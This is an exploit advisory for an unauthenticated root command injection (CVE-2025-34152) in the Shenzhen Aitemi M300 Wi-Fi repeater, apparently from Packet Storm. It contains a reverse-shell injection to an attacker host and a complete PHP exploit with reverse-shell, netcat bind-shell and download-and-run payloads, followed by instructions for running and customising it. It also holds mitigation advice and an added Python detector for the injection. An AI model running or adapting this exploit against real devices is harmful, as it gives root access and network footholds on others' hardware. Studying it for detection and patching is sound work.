Shenzhen Aitemi M300 Wi-Fi Repeater Remote Code Execution

19 Feb 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Unauthenticated root command injection on Shenzhen Aitemi M300 via time parameter (CVE-2025-34152).

=============================================================================================================================================
    | # Title     : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ebay.com/itm/404211745927                                                                                       |
    =============================================================================================================================================
    
    POC : 
    
    1. General Information
    ----------------------
    - Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater – Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
    - CVE ID: CVE-2025-34152
    - Vulnerability Type: Remote Command Injection – Unauthenticated
    - Privilege Level: Root
    - Severity: Critical (10/10)
    
    2. Vulnerability Description
    ----------------------------
    The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated
    remote command injection vulnerability in the "time" parameter handled by:
    
        protocol.csp?fname=system&opt=time_conf&function=set
    
    The parameter is passed directly into:
    
        date -s "$time"
    
    Because user-supplied input is unsanitized, an attacker can inject backtick-executed
    shell commands:
    
        time=`COMMAND`
    
    These commands execute with full root privileges without requiring authentication.
    
    3. Exploitation
    ----------------
    Example malicious injection:
    
        time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`
    
    URL-encoded version:
    
        time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60
    
    The payload is delivered through an unauthenticated POST request.
    
    4. Security Impact
    ------------------
    - Full remote command execution as root
    - No authentication required
    - No reboot needed
    - Immediate full compromise of the device
    - Allows uploading, downloading, deleting files
    - Enables persistent backdoors
    - May give access to the entire network environment
    
    5. Recommendations
    ------------------
    - Update firmware as soon as possible
    - Restrict access to port 80
    - Place the device behind a firewall/WAF
    - Avoid exposing the repeater to WAN environments
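
Added example (not part of the original advisory or any vendor code): to support the firewall/WAF recommendation above, this Python check flags requests to the `time_conf` endpoint from section 2 whose `time` value carries shell metacharacters. The expected timestamp format, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate value looks like "2026-02-19 12:30:00". The advisory
# does not document the format, so tune this allowlist to real UI traffic.
VALID_TIME = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")
# Characters that substitute or break out inside: date -s "$time"
SHELL_META = re.compile(r"[`$;|&<>\"'\\\n\r]")


def classify_request(method, target, body=""):
    """Return 'ignore', 'ok', 'suspicious' or 'injection' for one HTTP request."""
    parts = urlsplit(target)
    if not parts.path.endswith("/protocol.csp"):
        return "ignore"
    # Parameters may arrive in the query string, the form body, or both.
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    wanted = {"fname": "system", "opt": "time_conf", "function": "set"}
    if any(value not in params.get(key, []) for key, value in wanted.items()):
        return "ignore"
    verdict = "ok"
    for value in params.get("time", []):  # parse_qs has already percent-decoded
        if SHELL_META.search(value):
            return "injection"
        if not VALID_TIME.fullmatch(value):
            verdict = "suspicious"
    return verdict


# Constructed sample requests (method, request target, form body).
PREFIX = "fname=system&opt=time_conf&function=set"
SAMPLES = [
    ("GET", "/favicon.ico", ""),
    ("POST", "/protocol.csp?", PREFIX + "&time=2026-02-19%2012%3A30%3A00"),
    ("POST", "/protocol.csp?", PREFIX + "&time=tomorrow"),
    ("POST", "/protocol.csp?", PREFIX + "&time=%60COMMAND%60"),
    ("POST", "/protocol.csp?" + PREFIX, "time=%60COMMAND%60"),
]


def scan(samples):
    return [classify_request(*sample) for sample in samples]


if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(f"{verdict:10} {sample[0]} {sample[1]} {sample[2]}")
```

The same allowlist, applied on the device before the value reaches `date -s`, is the input validation the handler lacks; the detector only covers traffic that passes a point where requests can be inspected.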
    
    ===================================================================
    6. Full Converted PHP Exploit Code
    ===================================================================
    
    <?php
    
    class AitemiM300_Advanced {
    
        private $target;
        private $port;
        private $path;
        private $logFile = "exploit-log.txt";
    
        public function __construct($target, $port = 80, $path = "/") {
            $this->target = rtrim($target, '/');
            $this->port = $port;
            $this->path = $path;
        }
    
        private function log($txt) {
            file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
        }
    
        private function sendReq($method, $uri, $data = null, $headers = []) {
            $url = "http://{$this->target}:{$this->port}{$uri}";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
            if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
            $body = curl_exec($ch);
            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
    
            $this->log("HTTP $method $uri => Code $code");
            return ['body' => $body, 'code' => $code];
        }
    
        public function check() {
    
            $res = $this->sendReq("GET", "/favicon.ico");
    
            if ($res['code'] !== 200) {
                return "SAFE: favicon.ico missing – likely not vulnerable.";
            }
    
            $hash = hash("sha256", $res['body']);
            if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
                return "✓ Appears: Aitemi M300 device confirmed.";
            }
    
            return "UNKNOWN: Unable to verify device identity.";
        }
    
        public function exploit($cmd) {
    
            $raw  = "`$cmd`";
            $enc  = urlencode($raw);
            $enc  = str_replace("+", "%20", $enc);
    
            $data = "fname=system&opt=time_conf&function=set&time=$enc";
    
            $headers = [
                "Content-Type: application/x-www-form-urlencoded"
            ];
    
            return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
        }
    
        public function payload_reverse_shell($ip, $port) {
            return "sh -i >& /dev/tcp/$ip/$port 0>&1";
        }
    
        public function payload_bind_shell($port = 4444) {
            return "nc -lp $port -e /bin/sh";
        }
    
        public function payload_mips_wget($url) {
            return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
        }
    
        public function payload_pingback($ip) {
            return "ping -c 1 $ip";
        }
    
        public function run_payload($payload) {
            return $this->exploit($payload);
        }
    
    }
    
    // Example Usage:
    $exp = new AitemiM300_Advanced("192.168.1.1");
    
    echo $exp->check() . "\n";
    
    $payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
    $exp->run_payload($payload);
    
    echo "✓ Payload sent...\n";
    ?>
    
    ===================================================================
    7. How To Save And Execute The PHP Exploit Code
    ===================================================================
    
    Follow the steps below to properly save and run the converted PHP exploit code.
    
    1. Saving The Exploit
    ---------------------
    - Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
    - Copy the full PHP exploit code block from section 6.
    - Save the file as:
    
        aitemi_m300_rce.php
    
    - Make sure the file extension is `.php` and the encoding is UTF‑8.
    
    2. Preparing The Environment
    ----------------------------
    The exploit requires:
    - PHP 7.x or PHP 8.x installed.
    - cURL support enabled (php‑curl extension).
    - Internet / network access to the target device.
    
    Check PHP version:
    
        php -v
    
    Check curl module:
    
        php -m | findstr curl   (Windows)
        php -m | grep curl       (Linux)
    
    3. Running The Exploit (Windows)
    --------------------------------
    Open Command Prompt or PowerShell:
    
        cd C:\path\to\exploit\
        php aitemi_m300_rce.php
    
    4. Running The Exploit (Linux / macOS)
    --------------------------------------
    Terminal:
    
        cd /path/to/exploit/
        php aitemi_m300_rce.php
    
    Run in background:
    
        nohup php aitemi_m300_rce.php &
    
    5. Customizing Payloads
    -----------------------
    Modify:
    
        $exp = new AitemiM300_Advanced("192.168.1.1");
    
    Reverse shell:
    
        $payload = $exp->payload_reverse_shell("YOUR_IP", 4444);
    
    Bind shell:
    
        $payload = $exp->payload_bind_shell(5555);
    
    MIPS wget payload:
    
        $payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");
    
    Execute:
    
        $exp->run_payload($payload);
    
    6. Verifying RCE
    ----------------
    - Reverse shell connection  
    - Pingback  
    - exploit-log.txt  
    - Observed device behavior  
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Vulners AI Score: 6.4 (Medium risk) | CVSS 4: 9.4 | EPSS: 0.61676